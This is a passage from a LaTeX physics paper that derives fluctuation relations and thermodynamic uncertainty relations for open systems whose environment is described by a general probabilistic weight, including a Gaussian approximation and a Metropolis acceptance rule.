complex microscopic dynamics. The reader can find an unifying
framework of all these generalized distribution functions in the
so-called \textit{Superstatistics}, a theory recently proposed by C.
Beck and E.G.D Cohen \cite{cohen}.
The specific mathematical form of the probabilistic weight
$\omega(I)$ depends, in general, on the internal structure of the
environment, the character of its own equilibrium conditions, and
the nature of forces driving the underlying system-environment
thermodynamic interaction. Fortunately, the exact mathematical form
of the function $\omega \left (I\right)$ is unimportant in our
subsequent development. Despite of its generality, we shall show
that the internal thermodynamic state of the environment is fully
characterized by a finite set of \textit{control thermodynamic
parameters} $\beta^{\omega}=\left(
\beta_{1}^{\omega},\beta_{2}^{\omega },\ldots\right) $ that
constitute a natural extension of the constant parameters
$\beta=\left( \beta_{1},\beta_{2},\ldots\right) $ of the
Boltzmann-Gibbs distributions (\ref{bg.w}). Such a reduced
description is analogous to the equilibrium situation described
within the Gibbs' canonical ensemble (\ref{can}), where the external
influence is determined by the thermostat temperature $T$ regardless
its internal structure and composition, as long as the thermostat
exhibited a very large heat capacity and guaranteed a thermal
contact with the system under analysis.
\subsection{\label{effective}Thermodynamic control parameters of the environment}
The direct way to arrive at a suitable extension of the
thermodynamic control parameters $\beta=\left(
\beta_{1},\beta_{2},\ldots\right) $ of the Boltzmann-Gibbs
distributions (\ref{bg.w}) is achieved by appealing to the
\textit{conditions of thermodynamic equilibrium} such as the
condition of \textit{thermal equilibrium}, $T^{\omega
}=T^{s}$, the condition of \textit{mechanical equilibrium}, $p^{\omega}=p^{s}%
$, the condition of \textit{chemical equilibrium},
$\mu^{\omega}=\mu^{s}$, etc. As usual, the conditions of
thermodynamic equilibrium can be derived as the \textit{stationary
conditions} associated with the \textit{most likely macrostate}
$\bar{I}$ of the distribution function $\rho\left( I\right)
=\omega\left( I\right) \Omega\left( I\right) $:
\begin{equation}
\sup_{\bar{I}}\left\{ \omega\left( I\right) \Omega\left( I\right)
\right\} \Rightarrow\frac{\partial}{\partial I^{i}}\log\left\{
\omega\left( \bar{I}\right) \Omega\left( \bar{I}\right) \right\}
=0,
\end{equation}
which can be conveniently rewritten as follows:
\begin{equation}
\beta_{i}^{\omega}\left( \bar{I}\right) =\beta_{i}^{s}\left( \bar
{I}\right) . \label{eq1}%
\end{equation}
Here, $\beta_{i}^{s}$ are the system (microcanonical) thermodynamic
parameters:
\begin{equation}
\beta_{i}^{s}\left( I\right) =\frac{\partial S\left( I\right)
}{\partial
I^{i}} \label{micro.bb}%
\end{equation}
derived from the \textit{coarsed grained} entropy $S\left( I\right)
\equiv\log W\left( I\right) $ with $W\left( I\right) =\Omega\left(
I\right) \delta c$ ($\delta c$ is a small constant which makes the
volume $W$ dimensionless), while \textit{the quantities}
$\beta_{i}^{\omega}$ \textit{defined by}:
\begin{equation}
\beta_{i}^{\omega}\left( I\right) =-\frac{\partial\log\omega\left(
I\right) }{\partial I^{i}} \label{eff.temp}%
\end{equation}
\textit{are the control thermodynamic parameters of the
environment}. This last definition constitutes a fundamental
consideration in the present development.
As expected, the environment control thermodynamic parameters
(\ref{eff.temp}) drop to the constant parameters $\left\{
\beta_{i}\right\} $ of the Boltzmann-Gibbs distributions
(\ref{bg.w}) by replacing the general probabilistic weight
$\omega\left( I\right) $ by the one associated with this last
ensemble $\omega_{BG}\left( I\right) $. Similarly, they drop to
its microcanonical definitions (\ref{micro.bb}) when the environment
is just a short-range interacting system in a final thermodynamic
equilibrium, that is, when the probabilistic weight $\omega$ is
proportional to the states density $\Omega_{e}$. However, these
thermodynamic parameters turn \textit{effective} in the other cases,
overall, in those practical situations where the probabilistic
weight $\omega\left( I\right) $ corresponds to an environment in a
\textit{metastable or quasi-stationary equilibrium}. The possibility
to extend this type of thermodynamic concepts to situations of
metastability is not strange, since there exist robust evidences
supporting the introduction of concept of \textit{effective
temperature} in non-equilibrium systems (see in ref.\cite{leticia}
and references therein).
A remarkable feature of the environment thermodynamic parameters
(\ref{eff.temp}) is \textit{their implicit dependence on the
instantaneous macrostate} $I$ \textit{of the system}, since these
thermodynamic quantities are only constant for the particular case
of the Boltzmann-Gibbs distributions. Consequently, it is almost a
rule rather than an exception that \textit{the underlying
system-environment interaction provokes the existence of
non-vanishing correlated fluctuations among the environment
thermodynamic parameters and system observables}, $ \left\langle
\delta\beta_{i}^{\omega}\delta I^{j}\right\rangle \not =0$. Such a
realistic behavior of the interacting macroscopic systems is
systematically disregarded by the use of Boltzmann-Gibbs
distributions (\ref{bg.w}).
The quantities $\left\{ \beta_{i}^{\omega}\right\} $ act as
control parameters during the system-environment thermodynamic
interaction. A simple way to illustrate this role is by using the
probabilistic weight $\omega\left( I\right) $ in the Metropolis
Monte Carlo simulation \cite{met} of the system under the present
equilibrium conditions. The acceptance probability for a Metropolis
move $p\left( \left. I\right\vert I+\Delta I\right) $ is given by:
\begin{equation}
p\left( \left. I\right\vert I+\Delta I\right) =\min\left\{ \frac
{\omega\left( I+\Delta I\right) }{\omega\left( I\right)
},1\right\} .
\label{p1}%
\end{equation}
The fluctuations of the macroscopic observables satisfy the
condition $\left\vert \Delta I\right\vert \ll\left\vert I\right\vert
$ whenever the size $N$ of the system is sufficiently large,
allowing in this way to introduce the following approximation:
\begin{equation}
\log\left\{ \frac{\omega\left( I+\Delta I\right) }{\omega\left(
I\right)
}\right\} \simeq\frac{\partial\log\omega\left( I\right) }{\partial I^{i}%
}\cdot\Delta I^{i}
\end{equation}
and rewrite the acceptance probability (\ref{p1}) in an analogous
fashion to the usual Metropolis algorithm based on the
Boltzmann-Gibbs weight (\ref{bg.w}):
\begin{equation}
p\left( \left. I\right\vert I+\Delta I\right) \simeq\left\{
\exp\left[ -\beta_{i}^{\omega}\left( I\right) \Delta I^{i}\right]
,1\right\} .
\label{met.b}%
\end{equation}
This last expression shows that the environment thermodynamic
parameters (\ref{eff.temp}) provide a simple extension of control
parameters of Boltzmann-Gibbs distribution (\ref{bg.w}). Latter, we
shall employed this acceptance probability to perform numerical
simulations.
\subsection{Derivation of some general fluctuation relations}\label{Rigorour.r}
As already commented, the set $\Gamma$ represents all admissible
values of the system observables $I=\left( I^{2},I^{2},\ldots
I^{n}\right) $. Let us denote by $\partial_{i}A\left( I\right)
=\partial A\left( I\right) /\partial I^{i}$ the first partial
derivatives of a given real function $A\left( I\right) $ defined
on $\Gamma$. In general, the distribution function
$\rho(I)=\omega(I)\Omega(I)$ of Eq.(\ref{new}) should obey some
mathematical properties associated with its physical significance.
The are the following:
\begin{description}
\item[C1.] \textit{Existence}: The distribution function $\rho$ is a nonnegative,
bounded, continuous and differentiable function on $\Gamma$.
\item[C2.] \textit{Normalization}: The distribution function $\rho$ obeys the
normalization condition:%
\begin{equation}
\int_{\Gamma}\rho\left( I\right) dI=1. \label{norm}%
\end{equation}
\item[C3.] \textit{Boundary conditions}: The distribution function $\rho$
vanishes with its first partial derivatives $\left\{
\partial_{i}\rho\right\} $ on the boundary $\partial\Gamma$ of the
set $\Gamma$. Moreover, the distribution function $\rho$ satisfies
for $\alpha\leq n+1 $ the condition:
\begin{equation}
\lim_{\left\vert I\right\vert \rightarrow\infty}\left\vert
I\right\vert
^{\alpha}\rho\left( I\right) =0,\label{cond.bound}%
\end{equation}
when the boundary $\partial\Gamma$ contains the infinite point
$\left\{ \infty\right\} $ of $R^{n}$.
\item[C4.] \textit{Existence of the second partial derivatives}: The
distribution function $\rho$ admits second partial derivatives
$\left\{
\partial_{i}\partial_{j}\rho\right\} $ almost everywhere on $\Gamma$, with the
exception of a certain subset $\Sigma\subset\Gamma$ with vanishing
measure $\mu\left( \Sigma\right) $:
\begin{equation}
\mu\left( \Sigma\right) =\int_{\Sigma}\rho\left( I\right) dI=0.
\end{equation}
\end{description}
The mathematical conditions (C1-C3) constitute a direct extension of
conditions (C1-C3) of our previous work to a case with several
system observables (see in subsection 3.3 of Ref.\cite{vel-unc}).
Now, we have modified condition (C3) with the inclusion of the
property (\ref{cond.bound}), as well as we have considered a fourth
requirement, the condition (C4). In general, conditions (C3) and
(C4) ensure the existence of the expectation values $\left\langle
I^{i}\right\rangle $ and some relevant correlations functions such
as $\left\langle \delta I^{i}\delta I^{j}\right\rangle $.
Let us now introduce the quantity $\eta_{i}=\eta_{i}\left( I\right)
=\beta _{i}^{\omega}\left( I\right) -\beta_{i}^{s}\left( I\right)$
defined as the difference between the \textit{i}-th thermodynamic
parameters of the environment and the system, respectively. By
taking into consideration definitions (\ref{micro.bb}) and
(\ref{eff.temp}), the thermodynamic quantity $\eta_{i}$ can be
associated with a \textit{differential operator} $\hat{\eta}_{i}$
defined by:
\begin{equation}
\hat{\eta}_{i}=-\partial_{i}%
\end{equation}
due to the validity of the mathematical identity:
\begin{equation}
\hat{\eta}_{i}\rho\left( I\right) \equiv\eta_{i}\rho\left(
I\right) . \label{ope.def}
\end{equation}
Its demonstration reads as follows: the partial first derivative of
$\rho$ can be rewritten as $-\partial_{i}\rho=\left( -\partial
_{i}\log \rho\right) \rho$ and $-\partial_{i}\log
\rho\equiv-\partial_{i}\log
\omega-\partial_{i}S=\beta_{i}^{\omega}-\beta_{i}^{s}=\eta_{i}$,
with $S=\log W$ being the coarsed grained entropy with
$W=\Omega\delta c$.
The set of operators $\left\{ \hat{\eta}_{i}\right\} $ satisfy the
following identities:
\begin{equation}
\left[ A\left( I\right) ,\hat{\eta}_{i}\right]
=\partial_{i}A\left( I\right) ,~\left[
\hat{\eta}_{i}\hat{\eta}_{j}\right] =0,
\end{equation}
with $\left[ \hat{A},\hat{B}\right] =\hat{A}\hat{B}-\hat{B}\hat{A}$
being the so-called \textit{commutator} between two operators
$\hat{A}$ and $\hat{B}$. A remarkable particular case of the first
commutator is obtained when $A=\hat
{I}^{j}\equiv I^{j}$:%
\begin{equation}
\left[ \hat{I}^{j},\hat{\eta}_{i}\right] =\delta_{i}^{j}. \label{com.can}%
\end{equation}
The consecutive application of two operators $\hat{\eta}_{i}$ on the
distribution function $\rho$ leads to the following result:
\begin{equation}
\hat{\eta}_{i}\hat{\eta}_{j}\rho=\hat{\eta}_{i}\left(
\hat{\eta}_{j}\rho\right)
=\hat{\eta}_{i}\left( \eta_{j}\rho\right) =\left( -\partial_{i}\eta_{j}%
+\eta_{i}\eta_{j}\right) \rho. \label{f.d.r}%
\end{equation}
Notice here that condition (C4) is crucial for the existence of the
partial derivatives $\partial_{i}\eta_{j}$.
Now, let us combine the general mathematical properties (C1-C4) of
the distribution function $\rho\left( I\right) $ with the
operational representation (\ref{ope.def}) of the thermodynamic
quantity $\eta_{i}$ to demonstrate the validity of the following
expectation values:
\begin{equation}
\left\langle \eta_{i}\right\rangle =0,~\left\langle
\eta_{i}I^{j}\right\rangle
=\delta_{i}^{j},~\left\langle -\partial_{i}\eta_{j}%
+\eta_{i}\eta_{j}\right\rangle =0,\label{eq.gen}%
\end{equation}
which arise as particular cases of the following identity:
\begin{equation}\label{identA}
\left\langle\partial_{i}A\right\rangle=\left\langle
A\eta_{i}\right\rangle
\end{equation}
when $A=1$, $A=I^{j}$ and $A=\eta_{j}$, respectively. Here, $A(I)$
is a differentiable function that satisfies the condition $A(I)\leq
\lambda\left|I\right|^{2}$ when $\left|I\right|\rightarrow\infty$ if
the set $\Gamma$ is not finite.
The demonstration start from the consideration of a set of arbitrary
constants $\left\{ a^{i}\right\} $, which is employed to rephrase
the integral:
\begin{equation}
a^{i}\left\langle A\eta_{i}\right\rangle
=\int_{\Gamma}Aa^{i}\eta_{i}\rho dI
\end{equation}
by using a vector $\vec{J}$ with components $J^{i}=a^{i}\rho$ as
follows:
\begin{equation}\label{aux.1}
\int_{\Gamma}Aa^{i}\eta_{i}\rho dI=\int_{\Gamma}Aa^{i}\hat{\eta}_{i}%
\rho dI=-\int_{\Gamma}A\vec{\nabla}\cdot\vec{J}dI.
\end{equation}
By using the identity:
\begin{equation}
A\vec{\nabla}\cdot\vec{J}=-\vec{\nabla}\cdot\left( A\vec{J}\right)
+\vec{J}\cdot\vec{\nabla}A,
\end{equation}
the integral (\ref{aux.1}) can be rewritten as follows:
\begin{equation}
-\int_{\Gamma}A\vec{\nabla}\cdot\vec{J}dI=-\int_{\partial\Gamma}A\vec{J}\cdot
d\vec{\sigma}+\int_{\Gamma}\vec{J}\cdot\vec{\nabla}AdI.
\end{equation}
The surface integral over the boundary $\partial\Gamma$ vanishes as
a consequence of condition (C3). This conclusion is evident when the
set $\Gamma$ is finite since $J|_{\partial\Gamma}=0$. Conversely,
this vanishing takes place as a consequence of the limit:
\begin{equation}
\lim_{\left\vert I\right\vert \rightarrow\infty}\left\vert
I\right\vert ^{n-1}\left|A(I)\rho\left( I\right)\right|
\leq\lim_{\left\vert I\right\vert\rightarrow\infty}\lambda\left\vert
I\right\vert ^{n+1}\left|\rho\left(I\right)\right|=0.
\end{equation}
Identity (\ref{identA}) is obtained by considering $a^{j}=0$ for
$j\neq i$ and $a^{i}=1$ in the final expression:
\begin{equation}
a^{j}\left\langle A\eta_{j}\right\rangle
=\int_{\Gamma}\vec{J}\cdot\vec{\nabla}AdI\equiv
a^{j}\left\langle\partial_{j}A\right\rangle.
\end{equation}
By taking into account the vanishing of $\left\langle
\eta_{i}\right\rangle $ and well as the definition of the
correlation function $\left\langle
\delta\eta_{i}\delta I^{j}\right\rangle \equiv\left\langle \eta_{i}%
I^{j}\right\rangle -\left\langle \eta_{i}\right\rangle \left\langle
I^{j}\right\rangle $, the second relation of Eq.(\ref{eq.gen}) can
be conveniently rewritten as follows:
\begin{equation}
\left\langle \delta\eta_{i}\delta I^{j}\right\rangle
=\delta_{i}^{j},
\label{fundamental}%
\end{equation}
which is hereafter referred to as the \textit{fundamental
fluctuation relation}. By using this same procedure, the third
relation of Eq.(\ref{eq.gen}) can be rephrased as follows:
\begin{equation}
\left\langle \partial_{i}\eta_{j}\right\rangle =\left\langle
\delta\eta
_{i}\delta\eta_{j}\right\rangle , \label{assoc.fluct}%
\end{equation}
which is hereafter referred to as the \textit{associated fluctuation
relation}. Let us now analyze the physical consequences of these
mathematical results.
The vanishing of expectation values $\left\langle
\eta_{i}\right\rangle $ in Eq.(\ref{eq.gen}) drops to the following
thermodynamic relations:
\begin{equation}
\left\langle \beta_{i}^{\omega}\right\rangle =\left\langle \beta_{i}%
^{s}\right\rangle , \label{thermal.ave}%
\end{equation}
whose mathematical form explains by itself that the
\textit{conditions of thermodynamic equilibrium} are not only
supported by the argument of \textit{the most likely macrostate}
(see Eq.(\ref{eq1}) in the previous subsection), but it can be
rigorous expressed in terms of statistical expectation values. In
fact, the present version (\ref{thermal.ave}) of the thermodynamic
equilibrium conditions has a more general applicability than the
conventional version (\ref{eq1}), since the interpretation of the
state of equilibrium through the most likely macrostate $\bar{I}$ is
physically relevant for the large thermodynamic systems where
thermal fluctuations can be disregarded.
Conventionally, pairs of thermodynamic quantities such as energy $U$
and temperature $T$, volume $V$ and pressure $p$, magnetization
$\mathbf{M}$ and magnetic field $\mathbf{H}$, etc., are regarded as
\textit{conjugated thermodynamic quantities}. In this framework,
commutative relation (\ref{com.can}) allows to refer to the pairs
$(I^{i},\eta_{i})$ as \textit{thermodynamic complementary
quantities}. Examples of thermodynamic complementary quantities are
the energy $U$ and the inverse temperature difference
$\eta_{U}=1/T^{\omega}-1/T^{s}$ between the environment ($\omega$)
and system (s), or the generalized displacement $X$ and the quantity
$\eta_{X}=Y^{\omega}/T^{\omega}-Y^{s}/T^{s}$ defined in terms of the
generalized forces $(Y^{s},Y^{\omega})$ of the system and the
environment respectively. The physical relevance of this new
conceptualization relies on the fact that \textit{the thermal
fluctuations of thermodynamic complementary quantities cannot be
simultaneously reduced to zero}. In order to shown this claim, let
us first notice by considering Eq.(\ref{fundamental}) that only the
fluctuations corresponding to thermodynamic complementary quantities
$(I^{i},\eta_{i})$ are \textit{statistically dependent}. By
rewriting the fluctuation relations of complementary quantities
through the known \textit{Schwarz inequality}:
\begin{equation}
\left\langle \delta A^{2}\right\rangle \left\langle \delta
B^{2}\right\rangle
\geq\left\langle \delta A\delta B\right\rangle ^{2}, \label{SwI}%
\end{equation}
one obtains the following remarkable relations:
\begin{equation}
\Delta\eta_{i}\Delta I^{i}\geq1, \label{unc.gen}%
\end{equation}
where $\Delta x\equiv\sqrt{\left\langle \delta x^{2}\right\rangle }$
denotes the thermal dispersion of the quantity $x$. These
inequalities obey the form of \textit{uncertainty relations} rather
analogous to the ones associated with quantum theories. In fact,
Eq.(\ref{unc.gen}) is a direct extension of the energy-temperature
uncertainty relation obtained in our previous work \cite{vel-unc}:
\begin{equation}\label{ene.unc}
\Delta U\Delta(1/T^{\omega}-1/T^{s})\geq 1
\end{equation}
to other conjugated thermodynamic quantities such as the generalized
displacement $X$ and the generalized force $Y$:
\begin{equation}\label{dis.unc}
\Delta X\Delta(Y^{\omega}/T^{\omega}-Y^{s}/T^{s})\geq 1.
\end{equation}
By generalizing our previous result, the physical significance of
thermodynamic uncertainty relation (\ref{unc.gen}) is the following:
\textbf{Claim 1:} \textit{It is impossible to perform a simultaneous
exact
determination of the system conjugated thermodynamic parameter }$I^{i}$\textit{ and }$\beta_{i}^{s}=\partial_{i}%
S$\textit{ by using an experimental procedure based on the thermal
equilibrium condition (\ref{thermal.ave}) with a second system
regarded here as a \textquotedblleft measuring
apparatus\textquotedblright: any attempt to reduce to zero the
thermal uncertainties of the differences between their thermodynamic
parameters }$\Delta\eta _{i}\rightarrow0$\textit{\ involves a strong
perturbation on the conjugated macroscopic observable }$\Delta
I^{i}\rightarrow\infty$\textit{, and hence, }$I^{i}$\textit{\
becomes indeterminable; any attempt to reduce this perturbation to
zero, }$\Delta I^{i}\rightarrow0$\textit{, makes impossible to
determine the conjugated thermodynamic parameter
}$\beta_{i}^{s}$\textit{ by
using the condition of thermal equilibrium (\ref{thermal.ave}) since }%
$\Delta\eta_{i}\rightarrow\infty$\textit{.}
The present result constitutes a clear evidence about the existence
of \textit{complementary relations in any physical theory with a
statistical formulation}, an idea postulated by Bohr in the early
days of quantum mechanics \cite{bohr,Heisenberg} with a long history
in literature
\cite{Rosenfeld,Mandelbrot,Gilmore,Lindhard,Lavenda,Scholg,Uffink}.
Although our results are intimately related with other approaches
based on fluctuation theory \cite{Rosenfeld,Gilmore,Scholg}, there
exist subtle but fundamental differences distinguishing the present
proposal from other attempts carried out in the past. The interested
reader can see a more complete discussion about this subject in
Ref.\cite{Vel.PRA}.
Let us now discuss some consequences of the associated fluctuation
relation (\ref{assoc.fluct}). The quantities $\zeta_{ij}$:
\begin{equation}
\zeta_{ij}=\left\langle \partial_{i}%
\eta_{j}\right\rangle =-\int_{\Gamma}\rho\left( I\right)
\partial_{i}\partial_{j}\log
\rho\left( I\right) dI \label{hintegral}%
\end{equation}
are just the expectation values of the Hessian of the logarithm of
the distribution function $P_{ij}\left( I\right) $:
\begin{equation}
P_{ij}\left( I\right) =-\partial_{i}\partial_{j}\log \rho\left(
I\right) ,
\label{matrix function}%
\end{equation}
which can be referred to as the \textit{probabilistic Hessian}. Due
to the positive definite character of the correlation matrix
$O=\left[O_{ij}\right]$ with components $O_{ij}=\left\langle
\delta\eta_{i}\delta\eta_{j}\right\rangle $:
\begin{equation}
a^{i}a^{j}O_{ij}\equiv\left\langle \left( a^{i}\delta\eta_{i}\right)
^{2}\right\rangle \geq0,
\end{equation}
as well as the applicability of the associated fluctuation relation
(\ref{assoc.fluct}), $\zeta_{ij}=O_{ij}$, the quantities
$\zeta_{ij}$ constitute the components of \textit{a positive
definite symmetric matrix} $\zeta=\left[ \zeta_{ij}\right] $.
The positive definite character of matrix $\left[ \zeta_{ij}\right]
$ does not imply a positive definite character of the probabilistic
Hessian (\ref{matrix function}) for any macrostate
$I\in\Gamma$. By admitting the existence of a certain region\textit{\ }%
$\mathcal{A}^{\omega}\subset\Gamma$ where this last condition does
not hold for any admissible value of the internal control parameters
that drive the form of the probabilistic weight
$\omega(I)$\footnote{For example, the thermodynamic parameters
$(\beta,Y)$ of the Boltzmann-Gibbs distribution (\ref{BGD}), the
total additive quantities $I_{T}$ of distribution (\ref{pp1}), or
the formal parameters $a$ of distribution (\ref{ansatz2}.)}, the
positive definite character of $\zeta_{ij}$ indicates that
\textit{macrostates belonging to the subset
}$\mathcal{A}^{\omega}$\textit{ have always a poor contribution to
the integral of} Eq.(\ref{hintegral}). If the system size $N$ is
sufficiently large, the thermal fluctuations $\delta I^{i}$ and
$\delta\eta_{i}$ turn negligible and the distribution function
$\rho\left( I\right) $ significantly differs from zero in a very
small neighborhood around its local maxima. In this limit, all
system macrostates $I\in\mathcal{A}^{\omega}$ turns
\textit{inaccessible or thermodynamically unstable}. Since the
probabilistic Hessian (\ref{matrix function}) depends on the
particular mathematical form of the probabilistic weight
$\omega\left( I\right) $ that accounts for the external influence
of the environment, it is possible to claim the following:
\textbf{Claim 2:} \textit{The thermodynamic stability conditions and
the fluctuating behavior of a given open system in (a
quasi-stationary) equilibrium depend on the nature of external
conditions which have been imposed to.}
This last conclusion appears to be self-evident and natural, but it
contracts with some familiar equilibrium fluctuation relations such
as the ones shown in Eq.(\ref{familiar.fd}), which seem to suggest
(falsely) that system stability and fluctuating behavior only depend
on its intrinsic properties: \textit{the response functions}.
However, such a conclusion is strictly correct for an equilibrium
situation described by the Boltzmann-Gibbs distributions
(\ref{bg.w}). An illustrative example is the framework of
application of the canonical fluctuation relation
$C=\beta^{2}\left\langle\delta U^{2}\right\rangle$. The internal
energy $U$ fluctuates when the system is put in a thermal contact
with a bath, but it remains constant when the system is put in an
energetic isolation, and hence, there is no connection between the
energy fluctuations and the heat capacity for the second situation.
\subsection{\label{FGL}Gaussian approximation}
Fluctuation relations (\ref{fundamental}) and (\ref{assoc.fluct})
constitute two general mathematical results. The price to pay in
order to arrive at a suitable extension of the familiar equilibrium
fluctuation relations (\ref{familiar.fd}) is the consideration of a
\textit{Gaussian approximation} for thermal fluctuations, which
appears as a licit treatment when the size $N$ of the system under
consideration is sufficiently large.
Let us admit that the distribution function (\ref{new}) only
exhibits one (Gaussian) peak around the most likely macrostate
$\bar{I} $:
\begin{equation}
\rho\left( I\right) \propto\exp\left[ - \frac12 C_{ij}\delta
I^{i}\delta I^{j}\right] ,
\end{equation}
with $\delta I^{i}=I^{i}-\bar{I}^{i}$. Since the thermal
fluctuations $\delta I$ are small, the fluctuations of any
continuous and differentiable function $A\left( I\right) $ can be
expressed in a first-order approximation as follows:
\begin{equation}
\delta A\left( I\right) \simeq\partial_{i}A\left( \bar{I}\right)
\delta I^{i}.\label{first.ord}
\end{equation}
Formally, the thermodynamic parameters of the system $\beta_{i}^{s}%
=\partial_{i}S\left( I\right) $ depend on the macroscopic
observables $I$. Thus, their fluctuations $\delta\beta_{i}^{s}$ can
be expressed by using the fist-order approximation
(\ref{first.ord}):
\begin{equation}
\delta\beta_{i}^{s}=\partial_{k}\beta_{i}^{s}\left( \bar{I}\right)
\delta
I^{k}=H_{ik}\left( \bar{I}\right) \delta I^{k}, \label{hh}%
\end{equation}
with $H_{ij}\left( \bar{I}\right) =\partial_{i}\partial_{j}S\left(
\bar {I}\right) $ being the value of the \textit{entropy Hessian}
at the most likely macrostate. The substitution of Eq.(\ref{hh})
into the fundamental fluctuation relation
(\ref{fundamental}) allows to obtain the following expression:%
\begin{equation}
\left\langle \delta\beta_{i}^{\omega}\delta I^{j}\right\rangle =\delta_{i}%
^{j}+H_{ik}\left( \bar{I}\right) \left\langle \delta I^{k}\delta
I^{j}\right\rangle . \label{FGA}%
\end{equation}
By using these same reasonings, the associated fluctuation relation
(\ref{assoc.fluct}) can be rewritten as follows:%
\begin{equation}
\partial_{i}\eta_{j}\left( \bar{I}\right) =\left\langle \delta\eta_{i}%
\delta\eta_{j}\right\rangle . \label{AGA}%
\end{equation}
Result (\ref{AGA})\ evidences that the regions of thermodynamic
stability are those macrostates where the probabilistic Hessian:
\begin{equation}
P_{ij}\left( \bar{I}\right) =\partial_{i}\eta_{j}\left(
\bar{I}\right) =-\partial_{i}\partial_{j}\left\{ \log\omega\left(
\bar{I}\right) +S\left(
\bar{I}\right) \right\} , \label{PH2}%
\end{equation}
is a positive definite matrix. Besides, Eqs.(\ref{FGA}) and
(\ref{AGA}) indicate that the system fluctuating behavior and its
stability conditions depend on the external conditions which have
been imposed to (Claim 2), which are characterized here by the
correlations $\left\langle \delta\beta _{i}^{\omega}\delta
I^{j}\right\rangle $ and the Hessian of the logarithm of
probabilistic weight with opposite sign $F_{ij}\left( \bar{I}\right)
=-\partial_{i}\partial_{j}\log\omega\left( \bar{I}\right) $.
It is not difficult to verify that these identities provide the same
qualitative information about the system thermodynamic stability.
For example, the equilibrium conditions associated with the
Boltzmann - Gibbs distributions (\ref{bg.w}) follows from the
imposition of constraint $\delta\beta_{i}^{\omega}=0$ into
Eq.(\ref{FGA}). Thus, the correlation matrix $C^{ij}=\left\langle
\delta I^{k}\delta I^{j}\right\rangle $ is given by the inverse
matrix of the entropy Hessian $H_{ij}\left( \bar {I}\right) $ with
opposite sign:
\begin{equation}
-H^{ij}\left( \bar{I}\right) \equiv C^{ij}, \label{basic}%
\end{equation}
which is a well-known result of classical fluctuation theory
\cite{landau}. Since the correlation function $C^{ij}$ is always a
positive definite matrix:
\begin{equation}
a_{i}a_{j}C^{ij}\equiv\left\langle \left( a_{i}\delta I^{i}\right)
^{2}\right\rangle \geq0,
\end{equation}
the peaks of the Boltzmann-Gibbs distribution (\ref{BGD}) will never
be located in those regions where $H_{ij}\left( I\right) $ is a
nonnegative definite matrix, that is, where the entropy $S$
\textit{is not a locally concave function}. Thus, these macrostates
turn inaccessible in the limit of large system size $N$, so that,
all them constitute the unstable region
$\mathcal{A}^{\omega}=\mathcal{A}^{BG}$ of this particular ensemble.
Clearly, this is the same conclusion derived from Eqs.(\ref{AGA})
and (\ref{PH2}). As a by-product of the present reasonings, we have
arrive at the following:
\textbf{Claim 3:} \textit{The direct observation of unstable
macrostates $I\in\mathcal{A}^{BG}$ of the Boltzmann-Gibbs
distributions (\ref{BGD}) is only possible when $\left\langle
\delta\beta_{i}^{\omega}\delta I^{j}\right\rangle \not =0$, that is,
by considering an equilibrium situation where the internal
thermodynamic state of the environment is affected by thermodynamic
interaction with the system.}
There exist within the Gaussian approximation a fluctuation relation
which has no counterpart within the Boltzmann-Gibbs distributions
since it involves the correlation matrix $B_{ij}=\left\langle
\delta\beta_{i}^{\omega }\delta\beta_{j}^{\omega}\right\rangle $. By
using the first-order approximation:
\begin{equation}
\delta\beta_{i}^{\omega}=\partial_{j}\beta_{i}^{\omega}\left(
\bar{I}\right)
\delta I^{j}=F_{ij}\left( \bar{I}\right) \delta I^{j}%
\end{equation}
one can express the correlation matrix $B_{ij}=\left\langle
\delta\beta
_{i}^{\omega}\delta\beta_{j}^{\omega}\right\rangle $ as follows:%
\begin{equation}
\left\langle
\delta\beta_{i}^{\omega}\delta\beta_{j}^{\omega}\right\rangle
=F_{jk}\left( \bar{I}\right) \left\langle
\delta\beta_{i}^{\omega}\delta I^{k}\right\rangle .
\end{equation}
In the sake of simplicity, let us adopt the notation $\bar{F}_{ij}%
=F_{ij}\left( \bar{I}\right) $ and $\bar{H}_{ij}=H_{ij}\left( \bar
{I}\right) $. By applying two times the fluctuation relation
(\ref{FGA}) and the approximation
\begin{equation}
\left\langle \delta\beta_{i}^{\omega}\delta I^{j}%
\right\rangle =\bar{F}_{im}\left\langle \delta I^{m}\delta
I^{j}\right\rangle ,
\end{equation}
one obtains:
\begin{equation}
\left\langle
\delta\beta_{i}^{\omega}\delta\beta_{j}^{\omega}\right\rangle
=\bar{F}_{ij}+\bar{H}_{ij}+\bar{H}_{im}C^{mn}\bar{H}_{nj}.
\end{equation}
This result can be conveniently rewritten by performing the matrix
product with the correlation matrix $C^{ij}=\left\langle \delta
I^{i}\delta I^{j}\right\rangle $:
\begin{eqnarray}
B_{ik}C^{kj} =\bar{F}_{ik}C^{kj}+\bar{H}_{ik}C^{kj}+\bar{H}_{im}C^{mn}%
\bar{H}_{nk}C^{kj}\nonumber\\
=\delta_{i}^{j}+2\bar{H}_{ik}C^{kj}+\bar{H}_{im}C^{mn}\bar{H}_{nk}C^{kj}.
\end{eqnarray}
It is possible to recognize that the right hand side of the above
equation is simply the term $M_{i}^{k}M_{k}^{j}$, where
$M_{i}^{j}=\delta_{i}^{j}+\bar {H}_{ik}C^{kj}$ denotes the
correlation matrix $M_{i}^{j}=\left\langle
\delta\beta_{i}^{\omega}\delta I^{j}\right\rangle $ of
Eq.(\ref{FGA}). Thus, we have derived a \textit{complementary
fluctuation relation}:
\begin{equation}
\left\langle
\delta\beta_{i}^{\omega}\delta\beta_{k}^{\omega}\right\rangle
\left\langle \delta I^{k}\delta I^{j}\right\rangle =\left\langle
\delta \beta_{i}^{\omega}\delta I^{k}\right\rangle \left\langle
\delta\beta _{k}^{\omega}\delta I^{j}\right\rangle,
\end{equation}
or its equivalent representation in matrix form:
\begin{equation}\label{complementary}
B_{ik}C^{kj}=M_{i}^{k}M_{k}^{j}. \label{comp.tur}%
\end{equation}
General speaking, the elements of the correlation matrix
$M_{i}^{j}=\left\langle \delta\beta_{i}^{\omega}\delta
I^{j}\right\rangle $ could be very difficult to measure in a given
experimental situation, since it demands to perform simultaneous
measurements of the system observables $I$ and the thermodynamic
parameters of the environment $\beta^{e}$. The complementary
fluctuation relation (\ref{complementary}) allows to obtain in an
indirect way these fluctuating quantities by performing independent
measurements of the fluctuations of the system observables $I$ and
the environment thermodynamic parameters $\beta^{e}$.
\subsection{Extended equilibrium fluctuation-dissipation theorem}
For convenience, let us re-derive here the fluctuation relations
associated with the Boltzmann-Gibbs distribution (\ref{bg.w}). The
direct way to carry out this aim is by starting from the partition
function $Z\left( \beta\right) $:
\begin{equation}
Z\left( \beta\right) =\int_{\Gamma}\exp\left(
